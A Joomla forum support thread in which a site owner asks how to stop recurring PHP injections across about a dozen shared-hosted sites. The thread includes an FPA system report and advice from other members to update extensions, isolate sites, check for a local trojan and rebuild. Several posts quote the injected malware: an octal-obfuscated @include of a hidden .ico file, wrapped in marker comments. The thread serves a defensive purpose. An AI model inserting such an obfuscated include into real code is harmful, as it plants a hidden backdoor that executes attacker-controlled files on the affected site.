I'm getting constant php injections
Moderators: mandville, General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
I'm getting constant php injections
Constant
Despite installing security pro and RSFirewall and cleaning all injected php files I'm getting same sql injectiosn into the PHP files like this (see attached):
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[youtube]-embed-plus/.484229fd.ico";
Does any of you know how we can block php injections?
I have same issue as this guy http://www.webhostingtalk.com/showthread.php?t=1642283
In server error log to find hole: too many errors of :
[08-May-2017 02:09:21 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
[11-May-2017 21:29:42 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
Despite installing security pro and RSFirewall and cleaning all injected php files I'm getting same sql injectiosn into the PHP files like this (see attached):
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[youtube]-embed-plus/.484229fd.ico";
Does any of you know how we can block php injections?
I have same issue as this guy http://www.webhostingtalk.com/showthread.php?t=1642283
In server error log to find hole: too many errors of :
[08-May-2017 02:09:21 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
[11-May-2017 21:29:42 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
You do not have the required permissions to view the files attached to this post.
- Giraffex
- Joomla! Intern
- Posts: 74
- Joined: Fri Jan 21, 2011 3:51 pm
- Location: Guben
- Contact:
Re: I'm getting constant php injections
The best way to protect yourself is through the current Joomla system. But this will not help when poor quality components are installed on the website. Often they are the ones that cause hackers to break into websites.
- mandville
- Joomla! Master
- Posts: 15149
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: I'm getting constant php injections
Please run post the results of the fpa
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 23
- Joined: Fri Feb 26, 2010 10:08 am
- Contact:
Re: I'm getting constant php injections
Have you tried a security component? Try to install RSFirewall and make a scan of your website.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
We tried to install RSFirewall, and it shows me the infected files.
We clean them, a week later they come back. We have a hosting with 10 sites with Joomla and one WP that are injected weekly.
We clean them, a week later they come back. We have a hosting with 10 sites with Joomla and one WP that are injected weekly.
- mandville
- Joomla! Master
- Posts: 15149
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: I'm getting constant php injections
as requested viewtopic.php?f=806&t=969442
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- Per Yngve Berg
- Joomla! Master
- Posts: 30769
- Joined: Mon Oct 27, 2008 9:27 pm
- Location: Romerike, Norway
Re: I'm getting constant php injections
Is this hosted on a VPS?
You have to isolate the sites by installing with a separate OS user for each site to prevent cross site contamination.
It also looks like the vulnerably is in the WP site.
You have to isolate the sites by installing with a separate OS user for each site to prevent cross site contamination.
It also looks like the vulnerably is in the WP site.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
It's on shared hostgator account. VPS is too costly for 12 sites. They are all Joomla sites.
We tried WP to see if it helps but then WP php files got injected too.
I still get codes in PHP like this:
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[[youtube]]-embed-plus/.484229fd.ico";
We tried WP to see if it helps but then WP php files got injected too.
I still get codes in PHP like this:
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[[youtube]]-embed-plus/.484229fd.ico";
- Per Yngve Berg
- Joomla! Master
- Posts: 30769
- Joined: Mon Oct 27, 2008 9:27 pm
- Location: Romerike, Norway
Re: I'm getting constant php injections
We are still waiting for the FPA report as requested several times.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
Forum Post Assistant (v1.4.8 (koine)) : 1st May 2019 wrote:Last PHP Error(s) Reported :: wrote:[30-Apr-2019 17:02:10 America/Chicago] PHP Parse error: syntax error, unexpected end of file, expecting variable (T_VARIABLE) or '{' or '$' in /fpa-en.php on line 2327Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.9.5-Stable (Amani) 9-April-2019
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) | Owner: --protected-- . (uid: 1/gid: 1) | Group: --protected-- (gid: 1) | Valid For: 3.9
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: true | .htaccess/web.config: Yes | GZip: true | Cache: false | CacheTime: 30 | CacheHandler: file | CachePlatformPrefix: false | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 15 | Session handler: database | Shared sessions: false | SSL: 0 | Error Reporting: none | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: false | dbConnection Type: mysqli | PHP Supports J! 3.9.5: Yes | Database Supports J! 3.9.5: Yes | Database Credentials Present: Yes |
Host Configuration :: OS: Linux | OS Version: 3.10.0-693.17.1.2.ELK.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: --protected-- | System TMP Writable: Yes | Free Disk Space : 122.64 GiB |
PHP Configuration :: Version: 7.1.14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 32759 | Log Errors To: error_log | Last Known Error: 30th April 2019 17:02:10. | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: /home3/alsunna/public_html:/tmp:/home3/alsunna/public_html/info/tmp:/home3/alsunna/public_html/info/logs | Uploads: 1 | Max. Upload Size: 64M | Max. POST Size: 64M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M
Database Configuration :: Version: 5.6.41-84.1 (Client:5.6.41-84.1) | Host: --protected-- (--protected--) | default Collation: utf8_general_ci (default Character Set: utf8) | Database Size: 201.67 MiB | #of Tables: 206Detailed Environment :: wrote:PHP Extensions :: Core (7.1.14) | date (7.1.14) | libxml (7.1.14) | openssl (7.1.14) | pcre (7.1.14) | sqlite3 (7.1.14) | zlib (7.1.14) | bcmath (7.1.14) | bz2 (7.1.14) | calendar (7.1.14) | ctype (7.1.14) | curl (7.1.14) | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (7.1.14) | ftp (7.1.14) | gd (7.1.14) | gettext (7.1.14) | gmp (7.1.14) | SPL (7.1.14) | iconv (7.1.14) | session (7.1.14) | intl (1.1.0) | json (1.5.0) | mbstring (7.1.14) | mcrypt (7.1.14) | mysqli (7.1.14) | odbc (7.1.14) | standard (7.1.14) | PDO (7.1.14) | pdo_mysql (7.1.14) | pdo_sqlite (7.1.14) | Phar (2.0.2) | posix (7.1.14) | pspell (7.1.14) | Reflection (7.1.14) | imap (7.1.14) | SimpleXML (7.1.14) | soap (7.1.14) | sockets (7.1.14) | exif (7.1.14) | tidy (7.1.14) | tokenizer (7.1.14) | wddx (7.1.14) | xml (7.1.14) | xmlreader (7.1.14) | xmlrpc (7.1.14) | xmlwriter (7.1.14) | xsl (7.1.14) | zip (1.13.5) | cgi-fcgi () | SourceGuardian (11.1.5) | ionCube Loader () | Zend Engine (3.1.0) |
Potential Missing Extensions ::
Disabled Functions :: system | shell_exec | passthru | exec | popen | proc_open |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: NoFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (---) |
Elevated Permissions (First 10) ::Database Information :: wrote:Database statistics :: Uptime: 1844993 | Threads: 18 | Questions: 1689456911 | Slow queries: 22725 | Opens: 19266941 | Flush tables: 1 | Open tables: 16800 | Queries per second avg: 915.698 |Extensions Discovered :: wrote:Components :: SITE ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_FILESYSTEM_JOOMLA_TITLE (2.6.11) ? | WF_AGGREGATOR_VIMEO_TITLE (2.6.11) ? | WF_AGGREGATOR_[youtube]_TITLE (2.6.11) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.6.11) ? | WF_AGGREGATOR_VINE_TITLE (2.6.11) ? | WF_POPUPS_WINDOW_TITLE (2.6.11) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.6.11) ? | FLEXIcontent Links (2.3.0-rc) ? | WF_LINKS_JOOMLALINKS_TITLE (2.6.11) ? | WF_LINK_SEARCH_TITLE (2.6.11) ? | WF_CLEANUP_TITLE (2.6.11) ? | WF_LINK_TITLE (2.6.11) ? | WF_ANCHOR_TITLE (2.6.11) ? | WF_FULLSCREEN_TITLE (2.6.11) ? | WF_CHARMAP_TITLE (2.6.11) ? | WF_KITCHENSINK_TITLE (2.6.11) ? | WF_VISUALBLOCKS_TITLE (2.6.11) ? | WF_IMGMANAGER_TITLE (2.6.11) ? | WF_SEARCHREPLACE_TITLE (2.6.11) ? | WF_TEXTCASE_TITLE (2.6.11) ? | WF_HR_TITLE (2.6.11) ? | WF_FONTCOLOR_TITLE (2.6.11) ? | WF_VISUALCHARS_TITLE (2.6.11) ? | WF_NONBREAKING_TITLE (2.6.11) ? | WF_SOURCE_TITLE (2.6.11) ? | WF_INLINEPOPUPS_TITLE (2.6.11) ? | WF_CLIPBOARD_TITLE (2.6.11) ? | WF_SPELLCHECKER_TITLE (2.6.11) ? | WF_BROWSER_TITLE (2.6.11) ? | WF_CONTEXTMENU_TITLE (2.6.11) ? | WF_XHTMLXTRAS_TITLE (2.6.11) ? | WF_STYLESELECT_TITLE (2.6.11) ? | WF_TABLE_TITLE (2.6.11) ? | WF_DIRECTIONALITY_TITLE (2.6.11) ? | WF_PREVIEW_TITLE (2.6.11) ? | WF_EMOTIONS_TITLE (2.6.11) ? | WF_FONTSELECT_TITLE (2.6.11) ? | WF_LISTS_TITLE (2.6.11) ? | WF_MEDIA_TITLE (2.6.11) ? | WF_PRINT_TITLE (2.6.11) ? | WF_FORMATSELECT_TITLE (2.6.11) ? | WF_ARTICLE_TITLE (2.6.11) ? | WF_AUTOSAVE_TITLE (2.6.11) ? | WF_FONTSIZESELECT_TITLE (2.6.11) ? | WF_STYLE_TITLE (2.6.11) ? | WF_LAYER_TITLE (2.6.11) ? |
Components :: ADMIN ::
Core :: com_search (3.0.0) 1 | com_messages (3.0.0) 1 | com_contenthistory (3.2.0) 1 | com_postinstall (3.2.0) 1 | com_templates (3.0.0) 1 | com_modules (3.0.0) 1 | com_content (3.0.0) 1 | com_checkin (3.0.0) 1 | com_tags (3.1.0) 1 | com_users (3.0.0) 1 | com_admin (3.0.0) 1 | com_languages (3.0.0) 1 | com_media (3.0.0) 1 | com_ajax (3.2.0) 1 | com_categories (3.0.0) 1 | com_finder (3.0.0) 1 | com_fields (3.7.0) 1 | com_associations (3.7.0) 1 | com_config (3.0.0) 1 | com_newsfeeds (3.0.0) 1 | com_plugins (3.0.0) 1 | com_weblinks (3.5.0) 1 | com_cpanel (3.0.0) 1 | com_redirect (3.0.0) 1 | com_menus (3.0.0) 1 | com_banners (3.0.0) 1 | com_cache (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_installer (3.0.0) 1 | com_joomlaupdate (3.6.2) 1 | com_privacy (3.9.0) 1 | com_login (3.0.0) 1 |
3rd Party:: COM_JCE (2.6.11) 1 | Akeeba (6.4.2.1) 1 | COM_GANTRY (4.1.40) 1 | Securitycheck Pro (3.1.5) 1 | Facebook Recommendations bar (1.0) ? | Linkedin company profile (1.0) ? | Social share button (1.0) ? | Facebook Activity Feed (1.0) ? | Twitter feed (1.0) ? | Linkedin member profile (1.0) ? | Linkedin Build a Jobs (1.0) ? | Facebook Embedded Posts (1.0) ? | Facebook Commend (1.0) ? | Google Interactive posts (1.0) ? | Facebook Like Box (1.0) ? | Google Comment (1.0) ? | Linkedin Apply button (1.0) ? | Google Badge (1.0) ? | Facebook Recommendations box (1.0) ? | Linkedin company Insider (1.0) ? | Facebook Facepile (1.0) ? | Login button (1.0) ? | BT_SocialConnect (1.2.1) 1 | Facebook Profile (1.0) ? | Google page (1.0) ? | Facebook Page (1.0) ? | Linkedin Companies (1.0) ? | Facebook Groups (1.0) ? | Linkedin Groups (1.0) ? | Twitter Profile (1.0) ? | Linkedin Profile (1.0) ? | Mailing (1.0) ? | EasySlider (2.1.4) 0 | sh404SEF (4.4.4.1791) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_system_shlib (0.2.9.370) 1 | sh404sef - System plugin (4.4.4.1791) 1 | sh404sef - System mobile template s (4.4.4.1791) ? | sh404sef control panel icon (4.4.4.1791) 1 | com_jhackguard (2.0.2) 1 | RokSprocket (2.1.23) 1 | JMap (2.0.2) 1 | com_gantry5 (5.0.0-rc.1) 1 | COM_SPUPGRADE (4.1.1) 1 | Mailster (1.5.1) 1 | RSFirewall! (2.11.25) 1 | SP Simple Portfolio (1.3) ? | com_uniterevolution2 (4.3.8 b5) 1 | com_djimageslider (3.2.1) 1 | Bt_Portfolio (3.0.9) 1 | SP Page Builder (2.4.1) 1 |
Modules :: SITE ::
Core :: mod_tags_popular (3.1.0) 1 | mod_login (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_finder (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_weblinks (3.5.0) 1 | mod_syndicate (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_articles_popular (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_languages (3.5.0) 1 | mod_related_items (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_banners (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_search (3.0.0) 1 | mod_tags_similar (3.1.0) 1 | mod_breadcrumbs (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_articles_archive (3.0.0) 1 |
3rd Party:: BT Login (2.5.6) 1 | SP Simple Portfolio Module (1.3) ? | JSN EasySlider (2.1.4) 1 | BT Twitter Feeds (2.2) 1 | MOD_RANDOM_IMAGE_EXTENDED (3.3.0) 1 | BT Content Showcase (2.4.2) 1 | Hyper News Ticker (1.0) 1 | RokNavMenu (2.0.9) ? | ThemeHippo Pricing Table (1.0) 1 | CT Random Article (1.0.0) 1 | News Show SP2 (2.2) 1 | SP Page Builder (1.1) 1 | mod_news_pro_gk4 (GK4 3.4.0) 1 | BT Slideshow Pro (2.1.8) 1 | RokAjaxSearch (2.0.6) 1 | DJ-ImageSlider (3.2.1) 1 | Latest News + (2.1.3) 1 | Random Article (1.4.1.78) 1 | SP Facebook (1.4) 1 | BT Simple Slideshow (1.0.2) 1 | Custom Inline HTML (1.0) 1 | BT Google Maps (2.0.8) 1 | Mailster Subscriber (1.5.1) 1 | Hijri Date (1.0.1) 1 | Sj K2 Mega News (2.5) 1 | MOD_LATESTNEWSENHANCED (3.0.4) 1 | RokSprocket Module (2.1.6) ? | AP Smart LayerSlider (3.4) ? | SP Tweet (2.2.0) 1 | JA Image Hotspot (1.1.4) 1 |
Modules :: ADMIN ::
Core :: mod_title (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_login (3.0.0) 1 | mod_toolbar (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_stats_admin (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_custom (3.0.0) 1 | mod_logged (3.0.0) 1 | mod_sampledata (3.8.0) ? | mod_popular (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_latest (3.0.0) 1 | mod_version (3.0.0) 1 | mod_status (3.0.0) 1 |
3rd Party:: RSFirewall! Control Panel Module (1.4.0) 1 | sh404sef control panel icon (4.4.4.1791) 1 | mod_sppagebuilder_admin_menu (1.1) ? | mod_sppagebuilder_icons (1.0.2) ? | Securitycheck Pro Info Module (3.1.5) 1 |
Libraries :: SITE ::
Core ::
3rd Party:: RokCommon (3.2.0) 1 | file_fof30 (3.4.2) ? |
Plugins :: SITE ::
Core :: plg_fields_repeatable (3.9.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_color (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_url (3.7.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_message (3.9.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_user_profile (3.0.0) ? | plg_user_terms (3.9.0) 0 | plg_user_joomla (3.0.0) 1 | plg_user_contactcreator (3.0.0) ? | plg_twofactorauth_yubikey (3.2.0) 1 | plg_twofactorauth_totp (3.2.0) 1 | plg_authentication_gmail (3.0.0) ? | plg_authentication_ldap (3.0.0) ? | plg_authentication_cookie (3.0.0) 1 | plg_authentication_joomla (3.0.0) 1 | plg_extension_joomla (3.0.0) 1 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_installer_webinstaller (2.0.1) 1 | plg_captcha_recaptcha_invisible (3.8) 0 | plg_captcha_recaptcha (3.4.0) ? | plg_quickicon_privacycheck (3.9.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_finder_weblinks (3.5.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_finder_categories (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_pagenavigation (3.0.0) 1 | plg_content_confirmconsent (3.9.0) 0 | plg_content_pagebreak (3.0.0) 1 | plg_content_emailcloak (3.0.0) 1 | plg_content_vote (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_finder (3.0.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_system_fields (3.7.0) 1 | plg_system_languagefilter (3.0.0) 0 | plg_system_debug (3.0.0) 1 | plg_system_p3p (3.0.0) 1 | plg_system_sef (3.0.0) 1 | plg_system_stats (3.5.0) ? | plg_system_log (3.0.0) 1 | plg_system_sessiongc (3.8.6) 1 | plg_system_highlight (3.0.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_cache (3.0.0) 1 | plg_system_remember (3.0.0) 1 | plg_system_languagecode (3.0.0) ? | plg_system_privacyconsent (3.9.0) 0 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 0 | plg_system_logrotation (3.9.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_search_weblinks (3.5.0) 1 | plg_search_contacts (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_search_categories (3.0.0) 1 |
3rd Party:: RokPad (2.1.10) 1 | plg_editors_tinymce (4.5.9) 1 | plg_editors_jce (2.6.11) 1 | plg_editors_codemirror (5.40.0) 1 | BT AutoSubmit - Registration (1.0.0) 1 | plg_gantry5_preset (5.0.0-rc.1) 1 | plg_extension_jce (2.6.11) 1 | Extension - Inline editing Plugin H (1.0) ? | plg_installer_rsfirewall (1.0.0) 1 | plg_installer_jce (2.6.11) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | Installer - Securitycheck Pro (3.1.5) 1 | Ajax - Inline content editing (1.0.2b) 1 | Ajax - Inline Mode State listener (1.0) 1 | Helix3 - Ajax (1.9) 1 | Ajax - TreeLink (1.0) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_quickicon_gantry5 (5.0.0-rc.1) 1 | plg_quickicon_jce (2.6.0-pro-bet) 1 | plg_quickicon_akeebabackup (6.4.2.1) 1 | Smart Search - mp3 Browser Fork (0.3.1) 1 | Editors-xtd - BT Shortcode (1.0.0) 1 | Button - RokBox (2.0.15) 1 | BT Widget - Button (1.0.0) 1 | JSN_EASYSLIDER_PLUGIN_BUTTON_TITLE (2.1.4) 0 | PLG_MP3BROWSER_SYS_NAME (0.3.1) 1 | Content - Inline content editing fi (1.0) ? | Content - Facebook Like And Share (5.5) 1 | Content - Rapid1Pixelout (3.5) 1 | Content - RokInjectModule (1.6) 1 | RokBox (2.0.15) 1 | Content - Inline content editing (1.0) 1 | plg_content_jce (2.6.11) 1 | JSN_EASYSLIDER_PLUGIN_CONTENT_TITLE (2.1.4) 0 | Mailster Subscriber (1.5.1) 1 | Content - BT Shortcode (1.0.0) 1 | BT AutoSubmit - Content (1.0.0) 1 | T3 Framework (2.7.4) 1 | System - Inline content editing (1.0) 1 | PLG_SYSTEM_AKEEBAACTIONLOG (6.4.2.1) 0 | JHackGuard Plugin (2.0.4) 1 | System - url Inspector (3.1.5) 0 | System - Securitycheck Pro Update D (1.0.2) ? | System - SP PageBuilder (1.1) ? | System - RokBox (2.0.15) 1 | System - RokCommon (3.2.5) 1 | System - Inline History (1.0) 1 | System - Reset SEF Base (3.0) 1 | plg_system_ef4_jmframework (4.8.4) 1 | plg_system_jmframework (3.12) 1 | System - RokExtender (2.0.0) ? | plg_system_gantry5 (5.0.0-rc.1) 1 | System - RokBooster (1.1.18) 0 | System - Securitycheck Pro (3.1.5) 1 | PLG_SYSTEM_BACKUPONUPDATE (6.4.2.1) 0 | plg_system_djjquerymonster (1.2.0) 1 | System - Joomla Media Manager Exten (1.0) ? | System - SP Page Builder Pro Update (1.0) ? | System - RokSprocket (2.1.6) 1 | manage.myJoomla.com Secure Plugin (n/a) ? | Mailster Email Forwarder (1.5.1) 1 | System - Helix3 Framework (1.9) 1 | System - RSFirewall! Active Scanner (1.4.0) 1 | plg_system_jce (2.6.11) 1 | System - Yjsg Framework (2.3.6) 1 | System - Securitycheck Pro Cron (3.1.5) 1 | plg_system_jsnframework (2.0.2) 1 | plg_system_shlib (0.2.9.370) 1 | PLG_SYSTEM_JCH_OPTIMIZE (5.0.5) ? | sh404sef - System plugin (4.4.4.1791) 1 | BT Social Connect - System (1.0.0) 1 | PLG_SYSTEM_JSNEASYSLIDER (2.1.4) 0 | System - Inline HTML Module Version (1.0) ? | PLG_SYSTEM_AKEEBAUPDATECHECK (6.4.2.1) 0 | sh404sef - System mobile template s (4.4.4.1791) ? | System - BT Shortcode (1.0.1) 1 | System - Gantry 4 (4.1.40) 1 | Mailster Profile (1.5.1) 1 | plg_search_sppagebuilder (1.2) ? |Templates Discovered :: wrote:Templates :: SITE :: Flex (2.4) 1 | jm-wedding06 (1.02) 1 | protostar (1.0) 1 | beez3 (3.1.0) ? | rt_callisto (1.0.0) 1 |
Templates :: ADMIN :: hathor (3.0.0) 1 | isis (1.0) 1 |
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
Please advise.
- Webdongle
- Joomla! Master
- Posts: 43979
- Joined: Sat Apr 05, 2008 9:58 pm
Re: I'm getting constant php injections
You have no real option except to delete your files and rebuild them. Please see viewtopic.php?f=714&t=946026
You have a lot of out of date extensions. Following the instructions of viewtopic.php?f=714&t=946026 (and the thread it links to) will clean your site and rebuild you files with fresh up to date ones. If you are unable to follow the instructions then perhaps consider professional help.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- darb
- Joomla! Hero
- Posts: 2035
- Joined: Thu Jul 06, 2006 12:57 pm
- Location: Stockholm Sweden
Re: I'm getting constant php injections
First you can also then check so you dont have a local trojan on your own computer infecting your ftp client bcs it seems its an issue with two different kind of cms sites and I dont belive you could have timing of getting this problem at same time with Hostgator on several cms sites.
Never heard that Wordpress can spread virus to Joomla by a same hoster
Never heard that Wordpress can spread virus to Joomla by a same hoster
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
We have several sites under that hosting to delete all of them and re-install will take so much time and work.. my question is how do we block PHP injections? how to prevent it after we clean it?
- Webdongle
- Joomla! Master
- Posts: 43979
- Joined: Sat Apr 05, 2008 9:58 pm
Re: I'm getting constant php injections
Yep a lot of work but you have little choice. Following the process viewtopic.php?f=714&t=946026 will remove the hack files and make sure your extensions are up to date and that you don't have vulnerable ones. You can start by performing it on the folders for the hacked site. That may be enough. But if you get hacked after that then you will need to do it for all the sites. Other than that hire a professional.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".